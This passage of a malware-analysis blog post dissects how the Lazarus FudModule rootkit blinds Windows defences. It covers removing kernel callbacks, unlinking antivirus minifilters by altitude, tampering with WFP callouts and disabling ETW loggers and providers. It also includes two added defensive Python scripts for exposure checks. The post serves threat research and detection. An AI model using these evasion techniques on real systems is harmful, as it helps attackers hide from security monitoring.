  2547. <p>The callback removal itself is performed by directly modifying some internal data structures managed by the kernel. This was also the case in the previous version, as documented by <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">ESET</a> and <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">AhnLab</a>. There, the rootkit found the address of <code>nt!CallbackListHead</code> (which contains a doubly linked, circular list of all existing registry callbacks) and simply emptied it by pointing it to itself.&nbsp;</p>
  2548.  
  2549.  
  2550.  
  2551. <p>In the current version of FudModule, this technique was improved to leave some selected callbacks behind, perhaps making the rootkit stealthier. This updated version starts the same as the previous one: by finding the address of <code>nt!CallbackListHead</code>. This is done by resolving <code>CmUnRegisterCallback</code> (this resolution is performed by name, through iterating over the export table of <code>ntoskrnl</code> in memory), scanning its function body for the <code>lea rcx,[nt!CallbackListHead]</code> instruction, and then calculating the final address from the offset extracted from the instruction’s opcodes.&nbsp;</p>
  2552.  
  2553.  
  2554.  
  2555. <p>With the <code>nt!CallbackListHead</code> address, FudModule can iterate over the registry callback linked list. It inspects each entry and determines if the callback routine is implemented in <code>ntoskrnl.exe</code>, <code>applockerfltr.sys</code>, or <code>bfs.sys</code>. If it is, the callback is left untouched. Otherwise, the rootkit replaces the callback routine pointer with a pointer to <code>ObIsKernelHandle</code> and then proceeds to unlink the callback entry.&nbsp;</p>
  2556.  
  2557.  
  2558.  
  2559. <h4 class="wp-block-heading">0x02 – Object Callbacks&nbsp;</h4>
  2560.  
  2561.  
  2562.  
  2563. <p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks" target="_blank" rel="noreferrer noopener">Object callbacks</a> allow drivers to execute custom code in response to thread, process, and desktop handle operations. They are often used in self-defense, as they represent a convenient way to protect critical processes from being tampered with. Since the protection is enforced at the kernel level, this should protect even against elevated attackers, as long as they stay in user mode. Alternatively, object callbacks are also useful for monitoring and detecting suspicious activity.&nbsp;&nbsp;</p>
  2564.  
  2565.  
  2566.  
  2567. <p>Whatever the use case, object callbacks can be set up using the <code>ObRegisterCallbacks</code> routine. FudModule naturally attempts to do the exact opposite, that is, to remove all registered object callbacks. This could let it bypass self-defense mechanisms and evade object callback-based detection/telemetry.&nbsp;</p>
  2568.  
  2569.  
  2570.  
  2571. <p>The implementation of this rootkit technique has stayed the same since the previous version, so there is no need to go into too much detail. First, the rootkit scans the body of the <code>ObGetObjectType</code> routine to obtain the address of <code>nt!ObTypeIndexTable</code>. This contains an array of pointers to <code>_OBJECT_TYPE</code> structures, each of which represents a distinct object type, such as <code>Process</code>, <code>Token</code>, or <code>SymbolicLink</code>. FudModule iterates over this array (skipping the first two special-meaning elements) and inspects each <code>_OBJECT_TYPE.CallbackList</code>, which contains a doubly linked list of object callbacks registered for the particular object type. The rootkit then empties the <code>CallbackList</code> by making each node’s forward and backward pointer point to itself.&nbsp;</p>
  2572.  
  2573.  
  2574.  
  2575. <h4 class="wp-block-heading">0x04 – Process, Thread, and Image Kernel Callbacks&nbsp;</h4>
  2576.  
  2577.  
  2578.  
  2579. <p>This next rootkit technique is designed to disable three more types of kernel callbacks: <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine" target="_blank" rel="noreferrer noopener">process</a>, <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine" target="_blank" rel="noreferrer noopener">thread</a>, and <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine" target="_blank" rel="noreferrer noopener">image</a> callbacks. As their names suggest, these are used to execute custom kernel code whenever a new process is created, a new thread spawned, or a new image loaded (e.g. a DLL loaded into a process). These callbacks are extremely useful for detecting malicious activity. For instance, process callbacks allow AVs and EDRs to perform various checks on each new process that is to be created. Registering these callbacks is very straightforward. All that is needed is to pass the new callback routine as an argument to <code>PsSetCreateProcessNotifyRoutine</code>, <code>PsSetCreateThreadNotifyRoutine</code>, or <code>PsSetLoadImageNotifyRoutine</code>. These routines also come in their updated <code>Ex</code> variants, or even <code>Ex2</code> in the case of <code>PsSetCreateProcessNotifyRoutineEx2</code>.&nbsp;</p>
  2580.  
  2581.  
  2582.  
  2583. <p>Process, thread, and image callbacks are managed by the kernel in an almost identical way, which allows FudModule to use essentially the same code to disable all three of them. We find that this code has not changed much since the previous version, with the main difference being new additions to the list of drivers whose callbacks are left untouched.&nbsp;&nbsp;</p>
  2584.  
  2585.  
  2586.  
  2587. <p>FudModule first finds the addresses of <code>nt!PspNotifyEnableMask</code>, <code>nt!PspLoadImageNotifyRoutine</code>, <code>nt!PspCreateThreadNotifyRoutine</code>, and <code>nt!PspCreateProcessNotifyRoutine</code>. These are once again obtained by scanning the code of exported routines, with the exact scanning method subject to some variation based on the Windows build number. Before any modification is performed, the rootkit clears <code>nt!PspNotifyEnableMask</code> and sleeps for a brief amount of time. This mask contains a bit field of currently enabled callback types, so clearing it disables all callbacks. While some EDR bypasses would <a href="https://overlayhack.com/edr-bypass-evasion" target="_blank" rel="noreferrer noopener">stop here</a>, FudModule’s goal is not to disable all callbacks indiscriminately, so the modification of <code>nt!PspNotifyEnableMask</code> is only temporary, and FudModule eventually restores it to its original value. We believe the idea behind this temporary modification is to decrease the chance of a race condition that could potentially result in a bug check.&nbsp;</p>
  2588.  
  2589.  
  2590.  
  2591. <p>All three of the above <code>nt!Psp(LoadImage|CreateThread|CreateProcess)NotifyRoutine</code> globals are organized as an array of <code>_EX_FAST_REF</code> pointers to <code>_EX_CALLBACK_ROUTINE_BLOCK</code> structures (at least that’s the name used in <a href="https://github.com/reactos/reactos/blob/e0c17c3f462e3b62bf0c4ca2479c1e5c6b8ff496/sdk/include/ndk/extypes.h#L535" target="_blank" rel="noreferrer noopener">ReactOS,</a> Microsoft does not share a symbol name here). FudModule iterates over all these structures and checks if <code>_EX_CALLBACK_ROUTINE_BLOCK.Function</code> (the actual callback routine pointer) is implemented in one of the modules allowlisted in the table below. If it is, the pointer gets appended to a new array that then replaces the original one. This effectively removes all callbacks except for those implemented in one of the listed modules.&nbsp;</p>
  2592.  
  2593.  
  2594.  
  2595. <figure class="wp-block-table"><table><tbody><tr><td><code>ntoskrnl.exe&nbsp;</code></td><td><code>ahcache.sys&nbsp;</code></td><td><code>mmcss.sys&nbsp;</code></td><td><code>cng.sys&nbsp;</code></td></tr><tr><td><code>ksecdd.sys&nbsp;</code></td><td><code>tcpip.sys&nbsp;</code></td><td><code>iorate.sys&nbsp;</code></td><td><code>ci.dll&nbsp;</code></td></tr><tr><td><code>dxgkrnl.sys&nbsp;</code></td><td><code>peauth.sys&nbsp;</code></td><td><code>wtd.sys</code></td><td></td></tr></tbody></table><figcaption class="wp-element-caption">Kernel modules that are allowed during the removal of process, thread, and image callbacks.&nbsp;</figcaption></figure>
  2596.  
  2597.  
  2598.  
  2599. <h4 class="wp-block-heading">0x08 – Minifilter Drivers&nbsp;</h4>
  2600.  
  2601.  
  2602.  
  2603. <p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts" target="_blank" rel="noreferrer noopener">File system minifilters</a> provide a mechanism for drivers to intercept file system operations. They are used in a wide range of scenarios, including encryption, compression, replication, monitoring, antivirus scanning, or file system virtualization. For instance, an encryption minifilter would encrypt the data before it is written to the storage device and, conversely, decrypt the data after it is read. FudModule is trying to get rid of all the monitoring and antivirus minifilters while leaving the rest untouched (after all, some minifilters are crucial to keep the system running). The choice about which minifilters to keep and which to remove is based mainly on the minifilter’s altitude, an integer value that is used to decide the processing order in case there are multiple minifilters attached to the same operation. Microsoft defines <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers" target="_blank" rel="noreferrer noopener">altitude ranges</a> that should be followed by well-behaved minifilters. Unfortunately, these ranges also represent a very convenient way for FudModule to distinguish anti-malware minifilters from the rest.&nbsp;</p>
  2604.  
  2605.  
  2606.  
  2607. <p>In its previous version, FudModule disabled minifilters by directly patching their filter functions’ prologues. This would be considered very unusual today, with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard" target="_blank" rel="noreferrer noopener">HVCI</a> (Hypervisor-Protected Code Integrity) becoming more prevalent, even turned on by default on Windows 11. Since HVCI is a security feature designed to prevent the execution of arbitrary code in the kernel, it would stand in the way of FudModule trying to patch the filter function. This forced Lazarus to completely reimplement this rootkit technique, so the current version of FudModule disables file system minifilters in a brand-new data-only attack.&nbsp;</p>
  2608.  
  2609.  
  2610.  
  2611. <p>This attack starts by resolving <code>FltEnumerateFilters</code> and using it to find <code>FltGlobals.FrameList.rList</code>. This is a linked list of <code>FLTMGR!_FLTP_FRAME</code> structures, each representing a single <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts#:~:text=Each%20of%20FltMgr%27s%20filter%20device%20objects%20is%20called%20a%20frame" target="_blank" rel="noreferrer noopener">filter manager frame</a>. From here, FudModule follows another linked list at <code>_FLTP_FRAME.AttachedVolumes.rList</code>. This linked list consists of <code>FLTMGR!_FLT_VOLUME</code> structures, describing minifilters attached to a particular file system volume. Interestingly, the rootkit performs a sanity check to make sure that the pool tag associated with the <code>_FLT_VOLUME</code> allocation is equal to <code>FMvo</code>. With the sanity check satisfied, FudModule iterates over <code>_FLT_VOLUME.Callbacks.OperationsLists</code>, which is an array of linked lists of <code>FLTMGR!_CALLBACK_NODE</code> structures, indexed by IRP major function codes. For instance, <code>OperationsLists[IRP_MJ_READ]</code> is a linked list describing all filters attached to the <code>read</code> operation on a particular volume.&nbsp;</p>
  2612.  
  2613.  
  2614. <div class="wp-block-image">
  2615. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1389" height="458" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check.png" alt="" class="wp-image-8205" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check.png 1389w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-300x99.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-1024x338.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-768x253.png 768w" sizes="(max-width: 1389px) 100vw, 1389px" /><figcaption class="wp-element-caption">FudModule making sure the pool tag of a <code>_FLT_VOLUME</code> chunk is equal to <code>FMvo</code>.&nbsp;</figcaption></figure></div>
  2616.  
  2617.  
  2618. <p>For each <code>_CALLBACK_NODE</code>, FudModule obtains the corresponding <code>FLTMGR!_FLT_INSTANCE</code> and <code>FLTMGR!_FLT_FILTER</code> structures and uses them to decide whether to unlink the callback node. The first check is based on the name of the driver behind the filter. If it is <code>hmpalert.sys</code> (associated with the HitmanPro anti-malware solution), the callback will get immediately unlinked. Conversely, the callback is preserved if the driver&#8217;s name matches an entry in the following list:&nbsp;</p>
  2619.  
  2620.  
  2621.  
  2622. <figure class="wp-block-table"><table><tbody><tr><td><code>bindflt.sys&nbsp;</code></td><td><code>storqosflt.sys&nbsp;</code></td><td><code>wcifs.sys&nbsp;</code></td><td><code>cldflt.sys&nbsp;</code></td></tr><tr><td><code>filecrypt.sys&nbsp;</code></td><td><code>luafv.sys&nbsp;</code></td><td><code>npsvctrig.sys&nbsp;</code></td><td><code>wof.sys&nbsp;</code></td></tr><tr><td><code>fileinfo.sys&nbsp;</code></td><td><code>applockerfltr.sys&nbsp;</code></td><td><code>bfs.sys&nbsp;</code></td><td></td></tr></tbody></table><figcaption class="wp-element-caption">Kernel modules that are allowlisted to preserve their file system minifilters.</figcaption></figure>
  2623.  
  2624.  
  2625.  
  2626. <p>If there was no driver name match, FudModule uses <code>_FLT_FILTER.DefaultAltitude</code> to make its ultimate decision. Callbacks are unlinked if the default altitude belongs either to the range <code>[320000, 329999]</code> (<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers#:~:text=recover%20deleted%20files.-,FSFilter%20Anti%2DVirus,-320000%2D329999" target="_blank" rel="noreferrer noopener">defined</a> as <code>FSFilter Anti-Virus</code> by Microsoft) or the range <code>[360000, 389999]</code> (<code>FSFilter Activity Monitor</code>). Besides unlinking the callback nodes, FudModule also wipes the whole <code>_FLT_INSTANCE.CallbackNodes</code> array in the corresponding <code>_FLT_INSTANCE</code> structures.&nbsp;</p>
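<p>As an added example (not code from the Avast write-up or from the rootkit), the following Python script reimplements only the decision order described above, so a defender can check which of a host's minifilters FudModule would unlink. It assumes the filter name printed by <code>fltmc filters</code> equals the driver file name without its <code>.sys</code> extension; the listing it parses is a constructed sample, not output from a real system.</p>

```python
"""Exposure check for FudModule's minifilter unlinking logic (technique 0x08).

Added example, not Avast's or the rootkit's code. It reproduces only the
decision described in the write-up: an explicit driver-name deny list, a
driver-name allow list, and finally the DefaultAltitude ranges. The sample
`fltmc filters` listing below is constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Altitude ranges Microsoft assigns to these load order groups; FudModule
# unlinks callback nodes whose _FLT_FILTER.DefaultAltitude falls in either.
TARGETED_RANGES = {
    "FSFilter Anti-Virus": (320000, 329999),
    "FSFilter Activity Monitor": (360000, 389999),
}

# Driver names handled by name before the altitude is consulted.
ALWAYS_UNLINKED = {"hmpalert.sys"}
ALLOWLISTED = {
    "bindflt.sys", "storqosflt.sys", "wcifs.sys", "cldflt.sys",
    "filecrypt.sys", "luafv.sys", "npsvctrig.sys", "wof.sys",
    "fileinfo.sys", "applockerfltr.sys", "bfs.sys",
}


@dataclass
class Verdict:
    filter_name: str
    altitude: float
    unlinked: bool
    reason: str


def classify(filter_name: str, altitude: float) -> Verdict:
    """Apply the rootkit's order: name deny list, name allow list, altitude."""
    # Assumption: fltmc's filter name is the driver file name minus ".sys".
    name = filter_name.lower()
    if not name.endswith(".sys"):
        name += ".sys"
    if name in ALWAYS_UNLINKED:
        return Verdict(filter_name, altitude, True, "unlinked by driver name")
    if name in ALLOWLISTED:
        return Verdict(filter_name, altitude, False, "preserved by driver name")
    for group, (lo, hi) in TARGETED_RANGES.items():
        if lo <= altitude <= hi:
            return Verdict(filter_name, altitude, True, f"altitude in {group} range")
    return Verdict(filter_name, altitude, False, "altitude outside targeted ranges")


# One data row of `fltmc filters`: name, instance count, altitude, frame.
_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+(?:\.\d+)?)\s+(\S+)$")


def parse_fltmc(text: str) -> list[tuple[str, float]]:
    """Extract (filter name, altitude) pairs; header and separator rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            rows.append((m.group(1), float(m.group(3))))
    return rows


def assess(text: str) -> list[Verdict]:
    """Run the rootkit's decision over every filter in an `fltmc filters` listing."""
    return [classify(name, alt) for name, alt in parse_fltmc(text)]


# Constructed sample listing (names and altitudes chosen to exercise each branch).
SAMPLE_FLTMC = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
WdFilter                                4       328010         0
hmpalert                                3       345800         0
luafv                                   1       135000         0
bindflt                                 1       409800         0
FileInfo                                5        40150         0
SomeEdrMon                              4       385200         0
"""

if __name__ == "__main__":
    for v in assess(SAMPLE_FLTMC):
        state = "UNLINKED " if v.unlinked else "preserved"
        print(f"{state} {v.filter_name:<12} altitude={v.altitude:<9.0f} ({v.reason})")
```

On a real host, pipe the output of <code>fltmc filters</code> into <code>assess()</code>; every filter reported as unlinked is one whose file system visibility this rootkit would remove.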
  2627.  
  2628.  
  2629.  
  2630. <h4 class="wp-block-heading">0x10 &#8211; Windows Filtering Platform&nbsp;</h4>
  2631.  
  2632.  
  2633.  
  2634. <p><a href="https://learn.microsoft.com/en-us/windows/win32/fwp/windows-filtering-platform-start-page" target="_blank" rel="noreferrer noopener">Windows Filtering Platform</a> (WFP) is a documented set of APIs designed for host-based network traffic filtering. The WFP API offers capabilities for deep packet inspection as well as for modification or dropping of packets at various layers of the network stack. This is very useful functionality, so it serves as a foundation for a lot of Windows network security software, including intrusion detection/prevention systems, firewalls, and network monitoring tools. The WFP API is accessible both in user and kernel space, with the kernel part offering more powerful functionality. Specifically, the kernel API allows for installing so-called <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/network/introduction-to-windows-filtering-platform-callout-drivers" target="_blank" rel="noreferrer noopener">callout drivers,</a> which can essentially hook into the network stack and perform arbitrary actions on the processed network traffic. FudModule is trying to interfere with the installed callout routines in an attempt to disrupt the security they provide.&nbsp;&nbsp;</p>
  2635.  
  2636.  
  2637.  
  2638. <p>This rootkit technique is executed only when Kaspersky drivers (<code>klam.sys</code>, <code>klif.sys</code>, <code>klwfp.sys</code>, <code>klwtp.sys</code>, <code>klboot.sys</code>) are present on the targeted system and at the same time Symantec/Broadcom drivers (<code>symevnt.sys</code>, <code>bhdrvx64.sys</code>, <code>srtsp64.sys</code>) are absent. This check appears to be a new addition in the current version of FudModule. In other aspects, our analysis revealed that the core idea of this technique matches the <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">findings</a> described by ESET researchers during their analysis of the previous version.&nbsp;</p>
  2639.  
  2640.  
  2641.  
  2642. <p>Initially, FudModule resolves <code>netio!WfpProcessFlowDelete</code> to locate the address of <code>netio!gWfpGlobal</code>. As the name suggests, this is designed to store WFP-related global variables. Although its exact layout is undocumented, it is <a href="https://codemachine.com/articles/find_wfp_callouts.html" target="_blank" rel="noreferrer noopener">not hard to find</a> the build-specific offset where a pointer to an array of WFP callout structures is stored (with the length of this array stored at an offset immediately preceding the pointer). FudModule follows this pointer and iterates over the array, skipping all callouts implemented in <code>ndu.sys</code>, <code>tcpip.sys</code>, <code>mpsdrv.sys</code>, or <code>wtd.sys</code>. For the remaining callouts, FudModule accesses the callout structure’s flags and sets the flag stored in the least significant bit. While the callout structure itself is undocumented, this particular <code>0x01</code> flag is <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fwpsk/ns-fwpsk-fwps_callout2_" target="_blank" rel="noreferrer noopener">documented in another structure</a>, where it is called <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code>. The documentation reads “if this flag is specified, the filter engine calls the callout driver&#8217;s classifyFn2 callout function only if there is a context associated with the data flow”. In other words, setting this flag will conditionally disable the callout in cases where no flow context is available (see the implementation of <code>netio!IsActiveCallout</code> below).&nbsp;</p>
  2643.  
  2644.  
  2645. <div class="wp-block-image">
  2646. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1143" height="1127" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout.png" alt="" class="wp-image-8206" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout.png 1143w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-300x296.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-1024x1010.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-768x757.png 768w" sizes="(max-width: 1143px) 100vw, 1143px" /><figcaption class="wp-element-caption">The meaning of the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag can be nicely seen in <code>netio!IsActiveCallout</code>. If this flag is set and no flow context can be obtained, <code>IsActiveCallout</code> will return <code>false</code> (see the highlighted part of the condition).&nbsp;</figcaption></figure></div>
  2647.  
  2648.  
  2649. <p>While this rootkit technique has the potential to interfere with some WFP callouts, it will not be powerful enough to disrupt all of them. Many WFP callouts registered by security vendors already have the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag set by design, so they will not be affected by this technique at all. Given the initial driver check, it seems like this technique might be targeted directly at Kaspersky. While Kaspersky does install dozens of WFP callouts, about half of those are designed for processing flows and already have the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag set. Since we refrained from reverse engineering our competitor’s products, the actual impact of this rootkit technique remains unclear.&nbsp;</p>
  2650.  
  2651.  
  2652.  
  2653. <h4 class="wp-block-heading">0x20 – Missing&nbsp;</h4>
  2654.  
  2655.  
  2656.  
  2657. <p>So far, the rootkit techniques we analyzed were similar to those detailed by ESET in their paper on the earlier rootkit variant. But starting from now, we are getting into whole new territory. The <code>0x20</code> technique, which used to deal with Event Tracing for Windows (ETW), has been deprecated, leaving the <code>0x20</code> bit unused. Instead, there are two new replacement techniques that target ETW, indexed with the bits <code>0x40</code> and <code>0x80</code>. The indexing used to end at <code>0x40</code>, which was a technique to obstruct forensic analysis by disabling prefetch file creation. However, now the bits go all the way up to <code>0x200</code>, with two additional new techniques that we will delve into later in this blog.&nbsp;</p>
  2658.  
  2659.  
  2660.  
  2661. <h4 class="wp-block-heading">0x40 &#8211; Event Tracing for Windows: System Loggers</h4>
  2662.  
  2663.  
  2664.  
  2665. <p><a href="https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing" target="_blank" rel="noreferrer noopener">Event Tracing for Windows</a> (ETW) serves as a high-performance mechanism dedicated to tracing and logging events. In a nutshell, its main purpose is to connect providers (who generate some log events) with consumers (who process the generated events). Consumers can define which events they would like to consume, for instance, by selecting some specific providers of interest. There are providers built into the operating system, like <code>Microsoft-Windows-Kernel-Process</code> which generates process-related events, such as process creation or termination. However, third-party applications can also define their custom providers.&nbsp;&nbsp;</p>
  2666.  
  2667.  
  2668.  
  2669. <p>While many built-in providers are not security-related, some generate events useful for detection purposes. For instance, the <code>Microsoft-Windows-Threat-Intelligence</code> provider makes it possible to watch for suspicious events, such as writing another process’ memory. Furthermore, various security products take advantage of ETW by defining their custom providers and consumers. FudModule tampers with ETW internals in an attempt to suppress suspicious events and thus evade detection.&nbsp;</p>
  2670.  
  2671.  
  2672.  
  2673. <p>The main idea behind this rootkit technique is to disable system loggers by zeroing out <code>EtwpActiveSystemLoggers</code>. The specific implementation of how this address is found varies based on the target Windows version. On newer builds, the <code>nt!EtwSendTraceBuffer</code> routine is resolved first and used to find <code>nt!EtwpHostSiloState</code>. This points to an <code>_ETW_SILODRIVERSTATE</code> structure, and using a hardcoded build-specific offset, the rootkit can access <code>_ETW_SILODRIVERSTATE.SystemLoggerSettings.EtwpActiveSystemLoggers</code>. On older builds, the rootkit first scans the entire ntoskrnl <code>.text</code> section, searching for opcode bytes specific to the <code>EtwTraceKernelEvent</code> prologue. The rootkit then extracts the target address from the <code>mov ebx, cs:EtwpActiveSystemLoggers</code> instruction that immediately follows.&nbsp;</p>
  2674.  
  2675.  
  2676.  
  2677. <p>To understand the technique’s impact, we can take a look at how <code>EtwpActiveSystemLoggers</code> is used in the kernel. Accessed on a bit-by-bit basis, its least significant eight bits might be set in the <code>EtwpStartLogger</code> routine. This indicates that the value itself is a bit field, with each bit signifying whether a particular system logger is active. Looking at the other references to <code>EtwpActiveSystemLoggers</code>, a clear pattern emerges. After its value is read, there tends to be a loop guarded by a <code>bsf</code> instruction (bit scan forward). Inside the loop tends to be a call to an ETW-related routine that might generate a log event. The purpose of this loop is to iterate over the set bits of <code>EtwpActiveSystemLoggers</code>. When the rootkit clears all the bits, the body of the loop will never get executed, meaning the event will not get logged.&nbsp;</p>
  2678.  
  2679.  
  2680. <div class="wp-block-image">
  2681. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1796" height="579" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1.png" alt="" class="wp-image-8320" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1.png 1796w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-300x97.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-1024x330.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-768x248.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-1536x495.png 1536w" sizes="(max-width: 1796px) 100vw, 1796px" /><figcaption class="wp-element-caption">Example decompilation of <code>EtwpTraceKernelEventWithFilter</code>. After the rootkit zeroes out <code>EtwpActiveSystemLoggers</code>, <code>EtwpLogKernelEvent</code> will never get called from inside the loop since the condition guarding the loop will always evaluate to zero.&nbsp;</figcaption></figure></div>
  2682.  
  2683.  
  2684. <h4 class="wp-block-heading">0x80 &#8211; Event Tracing for Windows: Provider GUIDs&nbsp;</h4>
  2685.  
  2686.  
  2687.  
2688. <p>Complementing the previous technique, the <code>0x80</code> technique is also designed to blind ETW, albeit using a different approach. While the <code>0x40</code> technique was quite generic &#8211; aiming to disable all system loggers &#8211; this technique operates in a more surgical fashion. It contains a <a href="https://github.com/avast/ioc/tree/master/FudModule#targeted-etw-provider-guids" target="_blank" rel="noreferrer noopener">hardcoded list</a> of 95 GUIDs, each representing an identifier for some specific ETW provider. The rootkit iterates over all these GUIDs and attempts to disable the respective providers. While this approach requires the attackers to invest some effort into assembling the list of GUIDs, it also offers them a finer degree of control over which ETW providers they will eventually disrupt. This allows them to selectively target providers that pose a higher detection risk and ignore the rest to minimize the rootkit’s impact on the target system. </p>
  2689.  
  2690.  
  2691.  
2692. <p>This technique starts by obtaining the address of <code>EtwpHostSiloState</code> (or <code>EtwSiloState</code> on older builds). If <code>EtwpHostSiloState</code> was already resolved during the previous technique, the rootkit just reuses the address. If not, the rootkit follows the reference chain <code>PsGetCurrentServerSiloName</code> -&gt; <code>PsGetCurrentServerSiloGlobals</code> -&gt; <code>PspHostSiloGlobals</code> -&gt; <code>EtwSiloState</code>. In both scenarios, the rootkit ends up with a pointer to an <code>_ETW_SILODRIVERSTATE</code> structure, which contains a member named <code>EtwpGuidHashTable</code>. As the name suggests, this is a hash table holding ETW GUIDs (<code>_ETW_GUID_ENTRY</code>).&nbsp;&nbsp;</p>
  2693.  
  2694.  
  2695.  
2696. <p>FudModule then iterates over its hardcoded list of GUIDs and attempts to locate each of them in the hash table. Although the hash table internals are officially undocumented, Yarden Shafir provided a nice description in her <a href="https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/" target="_blank" rel="noreferrer noopener">blog</a> on exploiting an ETW vulnerability. In a nutshell, the hash is computed by just splitting the 128-bit GUID into four 32-bit parts and XORing them together. By ANDing the hash with <code>0x3F</code>, an index of the relevant hash bucket (<code>_ETW_HASH_BUCKET</code>) can be obtained. The bucket contains three linked lists of <code>_ETW_GUID_ENTRY</code> structures, each designated for a different type of GUID. FudModule always opts for the first one (<code>EtwTraceGuidType</code>) and traverses it, looking for the relevant <code>_ETW_GUID_ENTRY</code> structure.&nbsp;</p>
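<p>As an added example (not code from the Avast post or from FudModule), the following Python reproduces the bucket computation described above so that an analyst examining a memory dump can locate the <code>_ETW_HASH_BUCKET</code> for a provider GUID and check whether the provider's <code>_ETW_GUID_ENTRY</code> still has <code>ProviderEnableInfo.IsEnabled</code> set. The GUIDs and the dumped bucket contents are constructed sample data, not real provider identifiers.</p>

```python
"""Locate the EtwpGuidHashTable bucket for an ETW provider GUID.

Added example, not code from the Avast post or from FudModule. It implements
the hash as the post describes it: the 128-bit GUID is split into four 32-bit
parts that are XORed together, and the result is ANDed with 0x3F to pick one
of the 64 _ETW_HASH_BUCKET slots. Given a dump of that bucket's
EtwTraceGuidType list (here a constructed list of dicts), it then checks
whether the provider's ProviderEnableInfo.IsEnabled flag is still set.
"""
import struct
import uuid
from collections import defaultdict

BUCKET_MASK = 0x3F            # hash & 0x3F selects one of 64 buckets
BUCKET_COUNT = BUCKET_MASK + 1


def etw_guid_hash(guid: str) -> int:
    """XOR of the four DWORDs of the GUID in its Windows in-memory layout."""
    raw = uuid.UUID(guid).bytes_le   # Data1/Data2/Data3 little-endian, Data4 as-is
    d0, d1, d2, d3 = struct.unpack("<4I", raw)
    return d0 ^ d1 ^ d2 ^ d3


def etw_bucket_index(guid: str) -> int:
    """Index into EtwpGuidHashTable (0..63) for the given provider GUID."""
    return etw_guid_hash(guid) & BUCKET_MASK


def group_by_bucket(guids):
    """Map bucket index -> GUIDs, so each bucket only has to be walked once."""
    buckets = defaultdict(list)
    for g in guids:
        buckets[etw_bucket_index(g)].append(str(uuid.UUID(g)))
    return dict(buckets)


def find_guid_entry(bucket_entries, guid):
    """Walk a dumped EtwTraceGuidType list; return the matching entry or None.

    bucket_entries is a list of dicts with keys "guid" and "is_enabled",
    standing in for _ETW_GUID_ENTRY.Guid and ProviderEnableInfo.IsEnabled.
    """
    wanted = uuid.UUID(guid)
    for entry in bucket_entries:
        if uuid.UUID(entry["guid"]) == wanted:
            return entry
    return None


def provider_looks_tampered(bucket_entries, guid):
    """True if the provider's entry is present but IsEnabled has been cleared."""
    entry = find_guid_entry(bucket_entries, guid)
    return entry is not None and not entry["is_enabled"]


# Constructed sample data: not real provider GUIDs and not a real dump.
SAMPLE_GUID = "{00000001-0002-0003-0405-060708090a0b}"       # hashes to bucket 15
SAMPLE_BUCKET = [
    {"guid": "{0000000f-0000-0000-0000-000000000000}", "is_enabled": True},
    {"guid": SAMPLE_GUID, "is_enabled": False},   # cleared, as the rootkit leaves it
]

if __name__ == "__main__":
    idx = etw_bucket_index(SAMPLE_GUID)
    print(f"hash=0x{etw_guid_hash(SAMPLE_GUID):08x} bucket={idx}")
    print("tampered:", provider_looks_tampered(SAMPLE_BUCKET, SAMPLE_GUID))
```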
  2697.  
  2698.  
  2699.  
